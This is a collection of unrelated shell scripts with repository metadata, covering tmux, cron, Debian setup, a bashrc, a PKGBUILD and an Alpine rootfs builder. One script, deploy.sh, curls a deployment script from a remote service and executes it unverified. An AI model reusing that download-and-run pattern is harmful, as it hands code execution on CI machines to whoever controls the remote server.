# are intentionally unquoted so they can expand to multiple words.
juicefs mount -d -o allow_other \
    $JUICEFS_OPTIONS --log $JUICE_LOGFILE \
    --cache-dir $CACHE_PATH \
    --cache-size $CACHE_SIZE \
    $META_DATA $MOUNTPOINT

trap disconnect SIGINT
trap disconnect SIGTERM

# Stream all service logs; `wait` keeps the container alive until signalled.
tail -f "$REDIS_LOGFILE" "$RCLONE_LOGFILE" "$JUICE_LOGFILE" & wait
| true
|
5f0a790457f3089e9a2a294fcdcc495d64fe1de9
|
Shell
|
skwee357/dotfiles
|
/.config/tmux/scripts/tmux-kill-session
|
UTF-8
| 388
| 3.328125
| 3
|
[] |
no_license
|
#!/bin/bash
# Kill the currently-attached tmux session, first switching the client to
# another session (if any) so the terminal is not left detached.

IS_RUNNING=$(pgrep tmux)
# Nothing to do when we're outside tmux and no server is running.
if [[ -z $TMUX ]] && [[ -z $IS_RUNNING ]]; then
    exit 0
fi

SESSION_TO_KILL="$(tmux list-sessions | sed -n '/(attached)/s/:.*//p')"
SESSION_TO_SWITCH="$(tmux list-sessions | sed -n '/(attached)/!s/:.*//p' | head -n 1)"

# BUGFIX: use -n instead of '! -z', and quote the session names passed to
# -t so names containing whitespace survive.
if [[ -n "$SESSION_TO_SWITCH" ]]; then
    tmux switch-client -t "$SESSION_TO_SWITCH"
fi

tmux kill-session -t "$SESSION_TO_KILL"
| true
|
588fe561d92c5fdbf01668e7c4268fd308fba9d7
|
Shell
|
vrijeshpatel1997/CST-221
|
/var2.sh
|
UTF-8
| 357
| 3.03125
| 3
|
[] |
no_license
|
#!/bin/sh
# Demonstrates exporting a variable so that child processes inherit it.
# create a variable and export it for this shell as well as all other processes
MYVAR="This is a test"
export MYVAR;
echo "####################### "
echo "########################### var1.sh ############# "
echo "####################### "
printenv
# call another script
# NOTE(review): this file is stored as var2.sh, yet the banner above prints
# "var1.sh" and the exec below re-runs ./var2.sh — as written it would exec
# itself in a loop. Presumably this content belongs in var1.sh and is meant
# to chain into var2.sh; confirm against the companion script.
# Also: exec REPLACES the current process, so the comment below and the
# 'exit 0' are never reached when the exec succeeds.
exec ./var2.sh # run in same process and wait for it to complete
exit 0
| true
|
e87214fe014edf3c11ad7b535a6b49e7d8e8357e
|
Shell
|
riszkymf/cron_telegram
|
/entrypoint.sh
|
UTF-8
| 1,243
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash
# Container entrypoint: assemble a crontab line from the CRON_* env vars,
# install it, and run crond in the foreground.
# set -f disables globbing so the literal '*' defaults below stay literal.
set -f

CRONJOBS_FILE='crontab/cron'
# Matches "*/N" step values or plain numbers.
# NOTE(review): '^(\*\/[0-9])|([0-9])+$' groups as (^...)|(...$) — the two
# halves are anchored independently, so e.g. "1x" still matches; presumably
# '^((\*/[0-9]+)|[0-9]+)$' was intended — confirm before tightening.
not_null_re='^(\*\/[0-9])|([0-9])+$'

# The command to schedule is mandatory.
if [[ ! "$CRONJOB_COMMAND" ]]
then
    echo -e "\e[31mERROR : CRONJOB_COMMAND does not exist!\e[0m"
    exit
fi

# Month given but no day specified: default to the 1st of the month.
if [[ "$CRON_MONTH" =~ $not_null_re ]] && [[ ! "$CRON_DoM" =~ $not_null_re ]] && [[ ! "$CRON_DoW" =~ $not_null_re ]]
then
    CRON_DoM="1"
    CRON_DoW="*"
    DAY=true
fi

# Any explicit day-of-month/day-of-week implies day-level scheduling.
if [[ "$CRON_DoM" =~ $not_null_re ]] || [[ "$CRON_DoW" =~ $not_null_re ]]
then
    DAY=true
fi

# Day-level schedule without an hour: default the hour to 0 (midnight).
if [[ ! "$CRON_HOUR" =~ $not_null_re ]]
then
    # NOTE(review): leftover debug output — harmless but noisy.
    echo "SAY"
    if [[ $DAY = true ]]
    then
        CRON_HOUR=0
        HOUR=true
    fi
else
    HOUR=true
fi

# Hour-level schedule without minutes: default the minute to 0.
if [[ ! "$CRON_MIN" =~ $not_null_re ]] && [[ $HOUR = true ]]
then
    CRON_MIN=0
fi

# Unset fields fall back to '*'; unquoted expansion splits into 5 fields.
declare -a ARR=( ${CRON_MIN:-'*'} ${CRON_HOUR:-'*'} ${CRON_DoM:-'*'} ${CRON_MONTH:-'*'} ${CRON_DoW:-'*'} )

echo -e "\e[92mCRON SCHEDULE :" ${ARR[*]}
echo -e "------------------------------------------------------------------------------------------------------\e[0m"

# PUT YOUR CRONJOB HERE
cat >> /var/spool/cron/crontabs << EOF
${ARR[*]} $CRONJOB_COMMAND
EOF

echo "Listing Crontab"
echo "------------------------------------------------------------------------------------------------------"
ls crontab
# Foreground crond, logging to stdout, keeps the container alive.
crond -f -L /dev/stdout
| true
|
0925804bf55d0260bf18cbc3f9fcef0e29df7755
|
Shell
|
athoik/GreekStreamTV
|
/plugin/update.sh
|
UTF-8
| 214
| 3.046875
| 3
|
[] |
no_license
|
#!/bin/sh
# Refresh the GreekStreamTV station list.
# Usage: update.sh <destination-xml-path>

URL="http://sgcpm.com/livestream/stream.xml"

# Download into /tmp first so a failed fetch never clobbers the existing
# station file; only move it into place on success.
if wget -q -O /tmp/stream.xml $URL
then
    # BUGFIX: "$1" is quoted so a destination path with spaces stays intact.
    mv /tmp/stream.xml "$1"
    echo "stations updated successfully"
else
    echo "error downloading stations"
fi
echo
|
7d5b2bbe78e3273d629a83581b65cba316578798
|
Shell
|
gavinblair/weather
|
/setup.sh
|
UTF-8
| 2,641
| 2.53125
| 3
|
[
"MIT"
] |
permissive
|
# Bootstrap a grunt + qunit + jshint toolchain in the current project:
# installs dev dependencies, lays out js/{test,lib,prod}, writes a sample
# QUnit page/test, runs `npm init`, and generates a Gruntfile whose default
# task watches, lints, minifies and runs the tests.
npm install grunt --save-dev;
npm install grunt-contrib-watch --save-dev;
npm install grunt-contrib-uglify --save-dev;
npm install grunt-contrib-jshint --save-dev;
npm install grunt-contrib-qunit --save-dev;
npm install qunitjs --save-dev;
# Project layout: tests, hand-written libs, and minified production output.
mkdir --parents js/test;
mkdir --parents js/lib;
mkdir --parents js/prod;
# Copy the QUnit runtime out of node_modules so the test page is standalone.
cp node_modules/qunitjs/qunit/qunit.js js/test/qunit.js;
cp node_modules/qunitjs/qunit/qunit.css js/test/qunit.css;
# QUnit harness page (heredoc content is written verbatim).
cat <<EOF>js/test/test.html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>QUnit Example</title>
<link rel="stylesheet" href="qunit.css">
</head>
<body>
<div id="qunit"></div>
<div id="qunit-fixture"></div>
<script src="qunit.js"></script>
<script src="tests.js"></script>
</body>
</html>
EOF
# Smoke test so the pipeline is green from the start.
cat <<EOF>js/test/tests.js
QUnit.test( "hello test", function() {
ok( 1 == "1", "QUnit is working!" );
});
EOF
npm init;
# Gruntfile: jshint -> uglify -> qunit, re-run on every change by `watch`.
cat <<EOF>Gruntfile.js
module.exports = function(grunt){
grunt.initConfig({
pkg: grunt.file.readJSON('package.json'),
uglify: {
options: {
banner: '/*! <%= pkg.name %> <%= grunt.template.today() %> */\n'
},
build: {
src: ['js/lib/*.js', 'js/*.js'],
dest: 'js/prod/script.min.js'
}
},
jshint: {
files: 'js/*.js',
options: {
// Define globals exposed by modern browsers.
"browser": true,
// Define globals exposed by jQuery.
"jquery": true,
// Define globals exposed by Node.js.
"node": true,
// Force all variable names to use either camelCase style or UPPER_CASE
// with underscores.
"camelcase": false,
// Prohibit use of == and != in favor of === and !==.
"eqeqeq": false,
// Suppress warnings about == null comparisons.
"eqnull": true,
// Prohibit use of a variable before it is defined.
"latedef": true,
// Require capitalized names for constructor functions.
"newcap": true,
// Enforce use of single quotation marks for strings.
"quotmark": "single",
// Prohibit trailing whitespace.
"trailing": true,
// Prohibit use of explicitly undeclared variables.
"undef": true,
// Warn when variables are defined but never used.
"unused": true,
"force": true
}
},
qunit: {
all: ['js/test/test.html']
},
watch: {
files: ['js/lib/*.js', 'js/*.js', 'js/test/tests.js'],
tasks: ['jshint','uglify:build', 'qunit']
}
});
grunt.loadNpmTasks('grunt-contrib-watch');
grunt.loadNpmTasks('grunt-contrib-uglify');
grunt.loadNpmTasks('grunt-contrib-jshint');
grunt.loadNpmTasks('grunt-contrib-qunit');
grunt.registerTask('default', ['watch']);
};
EOF
echo "You may now use grunt!"
| true
|
98c58e752f1170f6dc2fbefa09f1da733d8b0ac2
|
Shell
|
Palkovsky/ps
|
/l7/z56/mk_rootfs.sh
|
UTF-8
| 1,398
| 4.0625
| 4
|
[] |
no_license
|
#!/bin/bash
IMG_SIZE=512M
BEFORE_CMD=""
CHROOT_CMD=""
AFTER_CMD=""
POSITIONAL=()
while [[ $# -gt 0 ]]
do
key="$1"
case $key in
--before)
BEFORE_CMD=$2
shift ; shift
;;
--chroot)
CHROOT_CMD=$2
shift ; shift
;;
--after)
AFTER_CMD=$2
shift ; shift
;;
*)
POSITIONAL+=($1)
shift
;;
esac
done
set -- ${POSITIONAL[@]}
# Download and unpack Alpine Linux
wget -O rootfs.tar.gz http://dl-cdn.alpinelinux.org/alpine/v3.12/releases/x86_64/alpine-minirootfs-3.12.0-x86_64.tar.gz
mkdir rootfs/ && tar -C rootfs/ -xvf rootfs.tar.gz
# Create image file, mount it as a loopback device, format as ext4, copy rootfs.
rm rootfs.img ; fallocate -l $IMG_SIZE rootfs.img
losetup -fP rootfs.img
echo 'y' | mkfs.ext4 rootfs.img
umount /mnt ; mount -o loop rootfs.img /mnt
cp -r rootfs/* /mnt/
[ "$BEFORE_CMD" ] && /bin/bash -c "$BEFORE_CMD"
# Run stuff inside chroot
chroot /mnt /bin/sh <<EOF
export PATH=$PATH:/bin/
echo "::sysinit:/bin/mount -t proc none /proc" >> /etc/inittab
echo "::sysinit:/bin/mount -t sysfs none /sys" >> /etc/inittab
[ "$CHROOT_CMD" ] && /bin/ash -c "$CHROOT_CMD"
EOF
[ "$AFTER_CMD" ] && /bin/bash -c "$AFTER_CMD"
# Umount and cleanup.
umount /mnt
rm -rf rootfs rootfs.tar.gz
chmod 666 rootfs.img
| true
|
efea4457e47a20e28a94cd2b866cc000c5e45f48
|
Shell
|
gonzo-soc/rollUpIt.lnx
|
/libs/lnx_debian09/sm.sh
|
UTF-8
| 9,564
| 3.125
| 3
|
[] |
no_license
|
#! /bin/bash
doUpdate_SM_RUI() {
local -r debug_prefix="debug: [$0] [ $FUNCNAME ] : "
printf "$debug_prefix ${GRN_ROLLUP_IT} ENTER ${END_ROLLUP_IT} \n"
apt-get -y update
# need to avoid grub-pc dialog: see https://github.com/hashicorp/vagrant/issues/289
echo "grub-pc grub-pc/install_devices_disks_changed multiselect /dev/sda" | debconf-set-selections
echo "grub-pc grub-pc/install_devices multiselect /dev/sda1" | debconf-set-selections
apt-get -y full-upgrade
local -r pre_pkgs=(
"bc" "debconf-utils" "unattended-upgrades" "apt-listchanges"
)
installPkgList_COMMON_RUI pre_pkgs ""
onFailed_SM_RUI $? "Failed apt-get preparation"
printf "$debug_prefix ${GRN_ROLLUP_IT} EXIT ${END_ROLLUP_IT} \n"
}
doInstallCustoms_SM_RUI() {
local -r debug_prefix="debug: [$0] [ $FUNCNAME ] : "
printf "$debug_prefix ${GRN_ROLLUP_IT} ENTER ${END_ROLLUP_IT} \n"
local -r pkg_list=(
"python-dev" "build-essential"
"zlib1g-dev" "libncurses5-dev" "libgdbm-dev" "libnss3-dev" "openssl"
"libssl-dev" "libreadline-dev" "libffi-dev" "ntpdate" "ruby-dev"
"libbz2-dev" "libsqlite3-dev" "dbus" "llvm" "libncursesw5-dev"
"xz-utils" "tk-dev" "liblzma-dev" "python-openssl" "dnsutils"
"locales"
)
runInBackground_COMMON_RUI "installPkgList_COMMON_RUI pkg_list \"\""
local deps_list=''
local cmd_list=''
if [ -n "$(isUbuntu_SM_RUI)" ]; then
deps_list=(
"install_golang_INSTALL_RUI"
)
cmd_list=(
"install_grc_INSTALL_RUI"
"install_rcm_INSTALL_RUI"
)
else
deps_list=(
"install_python3_7_INSTALL_RUI" "install_golang_INSTALL_RUI"
)
cmd_list=(
"install_tmux_INSTALL_RUI"
"install_vim8_INSTALL_RUI"
"install_grc_INSTALL_RUI"
"install_rcm_INSTALL_RUI"
)
fi
runCmdListInBackground_COMMON_RUI deps_list
runCmdListInBackground_COMMON_RUI cmd_list
printf "$debug_prefix ${GRN_ROLLUP_IT} EXIT ${END_ROLLUP_IT} \n"
}
doGetLocaleStr() {
echo -n "ru_RU.UTF-8 UTF-8"
}
#:
#: Set system locale
#: arg0 - locale string
#:
doSetLocale_SM_RUI() {
local -r debug_prefix="debug: [$0] [ $FUNCNAME ] : "
printf "$debug_prefix ${GRN_ROLLUP_IT} ENTER ${END_ROLLUP_IT} \n"
local -r locale_str="$1"
sed -E -i "s/^#(\s+${locale_str}.*)$/\1/" "/etc/locale.gen"
locale-gen
onFailed_SM_RUI $? "Failed <locale-gen> command"
printf "$debug_prefix ${GRN_ROLLUP_IT} EXIT ${END_ROLLUP_IT} \n"
}
doRunSkeletonUserHome_SM_RUI() {
local -r debug_prefix="debug: [$0] [ $FUNCNAME ] : "
printf "$debug_prefix ${GRN_ROLLUP_IT} ENTER ${END_ROLLUP_IT} \n"
# see https://unix.stackexchange.com/questions/269078/executing-a-bash-script-function-with-sudo
# __FUNC=$(declare -f skeletonUserHome; declare -f onErrors_SM_RUI)
__FUNC_SKEL=$(declare -f skeletonUserHome_SM_RUI)
__FUNC_ONERRS=$(declare -f onErrors_SM_RUI)
__FUNC_INS_SHFMT=$(declare -f install_vim_shfmt_INSTALL_RUI)
sudo -u "$1" bash -c ". $ROOT_DIR_ROLL_UP_IT/libs/addColors.sh;
. $ROOT_DIR_ROLL_UP_IT/libs/addRegExps.sh;
. $ROOT_DIR_ROLL_UP_IT/libs/install/install.sh;
. $ROOT_DIR_ROLL_UP_IT/libs/commons.sh;
. $ROOT_DIR_ROLL_UP_IT/libs/sm.sh;
. $ROOT_DIR_ROLL_UP_IT/libs/lnx_debian09/commons.sh;
. $ROOT_DIR_ROLL_UP_IT/libs/lnx_debian09/sm.sh;
$__FUNC_SKEL; $__FUNC_ONERRS; $__FUNC_INS_SHFMT;
skeletonUserHome_SM_RUI $1"
printf "$debug_prefix ${GRN_ROLLUP_IT} EXIT ${END_ROLLUP_IT} \n"
}
doSetupUnattendedUpdates() {
local -r debug_prefix="debug: [$0] [ $FUNCNAME ] : "
printf "$debug_prefix ${GRN_ROLLUP_IT} ENTER ${END_ROLLUP_IT} \n"
local -r uupgrades_fp="/etc/apt/apt.conf.d/50unattended-upgrades"
local -r uauto_upgrades_fp="/etc/apt/apt.conf.d/20auto-upgrades"
local -r admin_email="gonzo.soc@gmail.com"
set +o nounset
if [ -f "${uupgrades_fp}" ]; then
cp "${uupgrades_fp}" "${uupgrades_fp}.orig"
cat <<'EOFF' >${uupgrades_fp}
// Unattended-Upgrade::Origins-Pattern controls which packages are
// upgraded.
//
// Lines below have the format format is "keyword=value,...". A
// package will be upgraded only if the values in its metadata match
// all the supplied keywords in a line. (In other words, omitted
// keywords are wild cards.) The keywords originate from the Release
// file, but several aliases are accepted. The accepted keywords are:
// a,archive,suite (eg, "stable")
// c,component (eg, "main", "contrib", "non-free")
// l,label (eg, "Debian", "Debian-Security")
// o,origin (eg, "Debian", "Unofficial Multimedia Packages")
// n,codename (eg, "jessie", "jessie-updates")
// site (eg, "http.debian.net")
// The available values on the system are printed by the command
// "apt-cache policy", and can be debugged by running
// "unattended-upgrades -d" and looking at the log file.
//
// Within lines unattended-upgrades allows 2 macros whose values are
// derived from /etc/debian_version:
// ${distro_id} Installed origin.
// ${distro_codename} Installed codename (eg, "jessie")
Unattended-Upgrade::Origins-Pattern {
// Codename based matching:
// This will follow the migration of a release through different
// archives (e.g. from testing to stable and later oldstable).
// "o=Debian,n=jessie";
// "o=Debian,n=jessie-updates";
// "o=Debian,n=jessie-proposed-updates";
// "o=Debian,n=jessie,l=Debian-Security";
// Archive or Suite based matching:
// Note that this will silently match a different release after
// migration to the specified archive (e.g. testing becomes the
// new stable).
"o=Debian,a=stable";
"o=Debian,a=stable-updates";
//"o=Debian,a=proposed-updates";
"origin=Debian,codename=${distro_codename},label=Debian-Security";
};
// List of packages to not update (regexp are supported)
Unattended-Upgrade::Package-Blacklist {
// "vim";
// "libc6";
// "libc6-dev";
// "libc6-i686";
};
// This option allows you to control if on a unclean dpkg exit
// unattended-upgrades will automatically run
// dpkg --force-confold --configure -a
// The default is true, to ensure updates keep getting installed
//Unattended-Upgrade::AutoFixInterruptedDpkg "false";
// Split the upgrade into the smallest possible chunks so that
// they can be interrupted with SIGUSR1. This makes the upgrade
// a bit slower but it has the benefit that shutdown while a upgrade
// is running is possible (with a small delay)
//Unattended-Upgrade::MinimalSteps "true";
// Install all unattended-upgrades when the machine is shuting down
// instead of doing it in the background while the machine is running
// This will (obviously) make shutdown slower
//Unattended-Upgrade::InstallOnShutdown "true";
// Send email to this address for problems or packages upgrades
// If empty or unset then no email is sent, make sure that you
// have a working mail setup on your system. A package that provides
// 'mailx' must be installed. E.g. "user@example.com"
Unattended-Upgrade::Mail "${admin_email}";
// Set this value to "true" to get emails only on errors. Default
// is to always send a mail if Unattended-Upgrade::Mail is set
//Unattended-Upgrade::MailOnlyOnError "true";
// Do automatic removal of new unused dependencies after the upgrade
// (equivalent to apt-get autoremove)
//Unattended-Upgrade::Remove-Unused-Dependencies "false";
// Automatically reboot *WITHOUT CONFIRMATION* if
// the file /var/run/reboot-required is found after the upgrade
//Unattended-Upgrade::Automatic-Reboot "false";
// Automatically reboot even if there are users currently logged in.
//Unattended-Upgrade::Automatic-Reboot-WithUsers "true";
// If automatic reboot is enabled and needed, reboot at the specific
// time instead of immediately
// Default: "now"
//Unattended-Upgrade::Automatic-Reboot-Time "02:00";
// Use apt bandwidth limit feature, this example limits the download
// speed to 70kb/sec
//Acquire::http::Dl-Limit "70";
// Enable logging to syslog. Default is False
// Unattended-Upgrade::SyslogEnable "false";
// Specify syslog facility. Default is daemon
// Unattended-Upgrade::SyslogFacility "daemon";
EOFF
else
onFailed_SM_RUI $? "Error: there is no /etc/apt/apt.conf.d/50unattended-upgrades"
fi
echo unattended-upgrades unattended-upgrades/enable_auto_updates boolean true | debconf-set-selections
dpkg-reconfigure -f noninteractive unattended-upgrades
onFailed_SM_RUI $? "Error: can't generate /etc/apt/apt.conf.d/20auto-upgrades"
if [ -f "${uauto_upgrades_fp}" ]; then
cp "${uauto_upgrades_fp}" "${uauto_upgrades_fp}.orig"
cat <<-'EOFF' >${uauto_upgrades_fp}
//
// @src: https://blog.confirm.ch/unattended-upgrades-in-debian/
//
// Enable unattended upgrades.
APT::Periodic::Enable "1";
// Do "apt-get upgrade" every n-days (0=disable).
APT::Periodic::Unattended-Upgrade "3";
// Do "apt-get upgrade --download-only" every n-days (0=disable).
APT::Periodic::Update-Package-Lists "1";
// Do "apt-get upgrade --download-only" every n-days (0=disable).
APT::Periodic::Download-Upgradeable-Packages "1";
// Do "apt-get autoclean" every n-days (0=disable).
APT::Periodic::AutocleanInterval "7";
EOFF
else
onFailed_SM_RUI $? "Error: there is no /etc/apt/apt.conf.d/20auto-upgrades"
fi
set -o nounset
sed -i -E 's/^(email_address=).*$/\1gonzo.soc@gmail.com/g' "/etc/apt/listchanges.conf"
printf "$debug_prefix ${GRN_ROLLUP_IT} EXIT ${END_ROLLUP_IT} \n"
}
| true
|
d0e809a40c1dd2a237b994f48b79c64c493596f3
|
Shell
|
kth5/archpower
|
/sz/PKGBUILD
|
UTF-8
| 1,214
| 2.734375
| 3
|
[] |
no_license
|
# POWER Maintainer: Alexander Baldeck <alex.bldck@gmail.com>
# Maintainer: Bruno Pagani <archange@archlinux.org>
pkgname=sz
pkgver=2.1.12.5
pkgrel=3
pkgdesc="Modular parametrizable lossy compressor framework for scientific data"
arch=(x86_64 powerpc64le powerpc64 powerpc riscv64)
url="https://szcompressor.org/"
license=(BSD)
depends=(glibc gcc-libs)
makedepends=(cmake gcc-fortran hdf5 netcdf python python-numpy swig)
makedepends_powerpc64=(openmp)
makedepends_powerpc64le=(openmp)
makedepends_x86_64=(openmp)
source=(https://github.com/szcompressor/SZ/releases/download/v${pkgver}/sz-${pkgver}.tar.gz)
sha256sums=('32a820daf6019156a777300389d2392e4498a5c9daffce7be754cd0a5ba8729c')
build() {
openmp=ON
case "${CARCH}" in
powerpc|riscv64) openmp=OFF ;;
esac
cmake -B build -S SZ-${pkgver} \
-DCMAKE_INSTALL_PREFIX=/usr \
-DCMAKE_SKIP_RPATH=ON \
-DBUILD_FORTRAN=ON \
-DBUILD_HDF5_FILTER=ON \
-DBUILD_NETCDF_READER=ON \
-DBUILD_OPENMP=${openmp} \
-DBUILD_PYTHON_WRAPPER=ON \
-DBUILD_SZ_EXAMPLES=ON
make -C build
}
package() {
make -C build DESTDIR="${pkgdir}" install
install -Dm644 SZ-${pkgver}/copyright-and-BSD-license.txt -t "${pkgdir}"/usr/share/licenses/${pkgname}
rm "${pkgdir}"/usr/bin/test*
}
| true
|
c3e308e8cfb08ef8a221758cadc173315b943187
|
Shell
|
CNG/dotfiles_mac
|
/mods-available/base/functions/schedule-task
|
UTF-8
| 928
| 4.03125
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Add cron job if it doesn't exist
#
# Usage: schedule-task 'line_as_will_appear_in_crontab' [ user ]
#
# Example: schedule-task '*/3 * * * * cd $MT; perl ./tools/run-periodic-tasks -verbose >> $MTLOGDIR/rpt.log 2>&1' www-data
#
# Idea from http://stackoverflow.com/a/8106460/172602
# Exit if any command returns nonzero or unset variable referenced.
set -o errexit -o pipefail -o nounset
task_exists () {
local tasks
if [[ $user = $(whoami) ]]; then
tasks=$(crontab -l)
else
tasks=$(sudo crontab -l -u $user)
fi
# printf "Existing tasks: \n\n%s\n" "$tasks"
[[ $tasks = *$task* ]]
}
add_task () {
if [[ $user = $(whoami) ]]; then
cat <(crontab -l) <(echo "$task") | crontab -
else
cat <(sudo crontab -l -u $user) <(echo "$task") | sudo crontab -u $user -
fi
}
main () {
local task=$1
local user=${2:-$(whoami)}
task_exists || add_task
task_exists
}
main "$@"
| true
|
808c4773aaabca039e6842b4ed3341f2168daaa7
|
Shell
|
mika-fischer/dotfiles
|
/bash/bashrc
|
UTF-8
| 5,226
| 3.4375
| 3
|
[] |
no_license
|
#----------------------------------------------------------------------------
# ~/.bashrc
# This file is read for interactive shells.
#----------------------------------------------------------------------------
#----------------------------------------------------------------------------
# Environment variables
#----------------------------------------------------------------------------
[[ -e ~/.bash_env ]] && source ~/.bash_env || true
#----------------------------------------------------------------------------
# Aliases
#----------------------------------------------------------------------------
[[ -e ~/.aliases ]] && source ~/.aliases || true
#----------------------------------------------------------------------------
# Generic interactive shell initialization
#----------------------------------------------------------------------------
[[ -e ~/.shrc ]] && source ~/.shrc || true
#----------------------------------------------------------------------------
# Shell options
#----------------------------------------------------------------------------
shopt -s checkwinsize
shopt -s cmdhist
shopt -s histappend
set -o vi
#----------------------------------------------------------------------------
# History
#----------------------------------------------------------------------------
HISTCONTROL=ignoredups
HISTFILESIZE=10000
HISTSIZE=10000
#----------------------------------------------------------------------------
# Completion
#----------------------------------------------------------------------------
if [ -z "$BASH_COMPLETION" ]; then
if [ -f /etc/bash_completion ]; then
source /etc/bash_completion
fi
fi
#----------------------------------------------------------------------------
# Helper functions
#----------------------------------------------------------------------------
function truncate_start
{
local trunc_symbol="..."
local maxlength="$1"
shift
local string="$@"
local length="${#string}"
if [[ "$length" -gt "$maxlength" ]]; then
local offset=$(( $length - $maxlength ))
echo -ne "${trunc_symbol}${string:$offset:$maxlength}"
else
echo -ne "${string}"
fi
}
function truncate_end
{
local trunc_symbol="..."
local maxlength="$1"
shift
local string="$@"
local length="${#string}"
if [[ "$length" -gt "$maxlength" ]]; then
echo -ne "${string:0:$maxlength}${trunc_symbol}"
else
echo -ne "${string}"
fi
}
function settitle
{
local str="${@}"
case "$TERM" in
xterm*|rxvt*|gnome*|konsole*)
echo -ne "\e]0;${str}\007"
;;
screen*)
echo -ne "\ek${str}\e\\"
;;
esac
}
function settitle_pipe
{
export PREV_COMMAND="${PREV_COMMAND}${@}"
local cmd=$(truncate_end 30 "$PREV_COMMAND")
case "$TERM" in
xterm*|rxvt*|gnome*|konsole*)
echo -ne "\e]0;${cmd}\007"
;;
screen*)
echo -ne "\ek${cmd}\e\\"
;;
esac
export PREV_COMMAND="${PREV_COMMAND} | "
}
#----------------------------------------------------------------------------
# Prompt
#----------------------------------------------------------------------------
RESET="\[\e[00m\]"
BLACK="\[\e[00;30m\]"
GRAY="\[\e[01;30m\]"
RED="\[\e[00;31m\]"
LRED="\[\e[01;31m\]"
GREEN="\[\e[00;32m\]"
LGREEN="\[\e[01;32m\]"
BROWN="\[\e[00;33m\]"
YELLOW="\[\e[01;33m\]"
BLUE="\[\e[00;34m\]"
LBLUE="\[\e[01;34m\]"
PURPLE="\[\e[00;35m\]"
LPURPLE="\[\e[01;35m\]"
CYAN="\[\e[00;36m\]"
LCYAN="\[\e[01;36m\]"
LGRAY="\[\e[00;37m\]"
WHITE="\[\e[01;37m\]"
if [[ $EUID == 0 || $UID == 0 ]]; then
USER_COLOR=$LRED
else
USER_COLOR=$GREEN
fi
[[ $USER == mfischer || $USER == mika ]] || P_USER="$USER"
[[ -n $SSH_CONNECTION ]] && P_HOST="$HOSTNAME"
[[ -n $P_USER && -n $P_HOST ]] && P_AT="@"
[[ -n $P_USER || -n $P_HOST ]] && P_COLON=":"
PS1="\
${YELLOW}\${P_CONDA}\
${USER_COLOR}${P_USER}\
${GREEN}${P_AT}\
${CYAN}${P_HOST}\
${RESET}${P_COLON}\
${LBLUE}\${P_PATH}\
${LRED}\${P_STATUS}\
${PURPLE}\${P_VCS}\
${RESET}\\\$ "
function my_prompt_command
{
# Exit code of last command
local RC=$?
[[ $RC -ne 0 ]] && P_STATUS="($RC)" || P_STATUS=""
if [[ -n $CONDA_DEFAULT_ENV ]]; then
P_CONDA="[$CONDA_DEFAULT_ENV${MAGENTA}]"
else
P_CONDA=""
fi
# Git branch display
if declare -F __git_ps1 >/dev/null 2>&1; then P_VCS=$(__git_ps1 "[%s]"); fi
# Get truncated path
[[ "$PWD" == "$HOME" ]] && local PWD2="~"
[[ -z "$PWD2" ]] && [[ "$PWD" == "$HOME/" ]] && local PWD2="~/"
[[ -z "$PWD2" ]] && local PWD2="${PWD/#$HOME\//~/}"
P_PATH=$(truncate_start 30 "$PWD2")
# Set xterm title and screen title
settitle "${P_USER}${P_AT}${P_HOST}${P_COLON}${P_PATH}"
# Hack to cut and paste together pipelined commands
export PREV_COMMAND=""
# Write new commands to history file
history -a
}
PROMPT_COMMAND='my_prompt_command'
trap 'settitle_pipe "$BASH_COMMAND"' DEBUG
#----------------------------------------------------------------------------
# Local bash initialization
#----------------------------------------------------------------------------
[[ -e ~/.bashrc.local ]] && source ~/.bashrc.local || true
# vim: ft=sh
| true
|
01f9f3077a0f7fbece3f45c119cdc8fa82370199
|
Shell
|
adunkman/deployasaur.us
|
/public/deploy.sh
|
UTF-8
| 2,979
| 3.6875
| 4
|
[] |
no_license
|
#!/bin/bash
blue=$(tput setaf 4)
green=$(tput setaf 2)
yellow=$(tput setaf 3)
red=$(tput setaf 1)
reset=$(tput sgr0)
function print() {
echo "${blue}http://deployasaur.us:${reset} $1"
}
[[ $(git remote -v) =~ git://github.com/([^ ]+).git ]]
repository=${BASH_REMATCH[1]}
branch=$TRAVIS_BRANCH
build=$TRAVIS_BUILD_NUMBER
job=$TRAVIS_JOB_NUMBER
id=$TRAVIS_BUILD_ID
if [[ $TRAVIS_PULL_REQUEST != "false" ]]; then
print "woah there! dinosaurs never deploy pull requests."
print "${yellow}exiting without deploying.${reset}"
exit
fi
if [[ $TRAVIS_TEST_RESULT != "0" ]]; then
print "woah there! your tests didn't pass!"
print "${yellow}exiting without deploying.${reset}"
exit
fi
print "howdy $repository $branch build $build! nice to hear from you."
print "checking in with the dinosaur overlords..."
url="http://www.deployasaur.us/$repository/$branch/$build/script?job=${job}&id=${id}"
status=$(curl -s $url -o response -w %{http_code})
case $status in
200)
print "running your deployment script..."
chmod a+x response
echo ""
./response
code=$?
echo ""
if [ $code -eq 0 ]; then
print "${green}your deployment script has finished successfully (exit code $code).${reset}"
print "thankful? tweet @adunkman mentioning #deployasaurus"
else
print "${red}your deployment script failed (exit code $code).${reset}"
print "this is probably not an issue with deployasaur.us."
fi
print "reporting deployment status..."
url="http://www.deployasaur.us/$repository/$branch/$build/status?job=${job}"
status=$(curl -X PUT -d "code=$code" -s $url -o reportStatus -w %{http_code})
if [ $status -eq 200 ]; then
print "all done!"
else
print "${red}couldn't report deployment status: something strange happened (status $status).${reset}"
print "${red}response for debugging purposes:${reset}"
echo ""
echo $(cat reportStatus)
echo ""
print "${red}please file an issue with this complete output${reset}"
print "${red}issues url: http://github.com/adunkman/deployasaur.us/issues${reset}"
fi
;;
202)
print "${yellow}other jobs must check-in before deployment occurs.${reset}"
print "$(cat response)"
print "${yellow}exiting without deploying.${reset}"
;;
404)
print "${red}i don't know about this repository and branch.${reset}"
print "${red}are you sure you've created a deployment script for $repository/$branch?${reset}"
print "${yellow}exiting without deploying.${reset}"
;;
*)
print "${red}something strange happened (status $status).${reset}"
print "${red}response for debugging purposes:${reset}"
echo ""
echo $(cat response)
echo ""
print "${red}please file an issue with this complete output${reset}"
print "${red}issues url: http://github.com/adunkman/deployasaur.us/issues${reset}"
print "${yellow}exiting without deploying.${reset}"
;;
esac
print "bye now!"
| true
|
fcf4b7af76ee195982546a8667b1f1230abd0efd
|
Shell
|
amercader/WMS-Inspector
|
/build/build.sh
|
UTF-8
| 913
| 3.921875
| 4
|
[] |
no_license
|
#! /bin/sh
usage="Usage: $0 [-j -v version] directory"
version=""
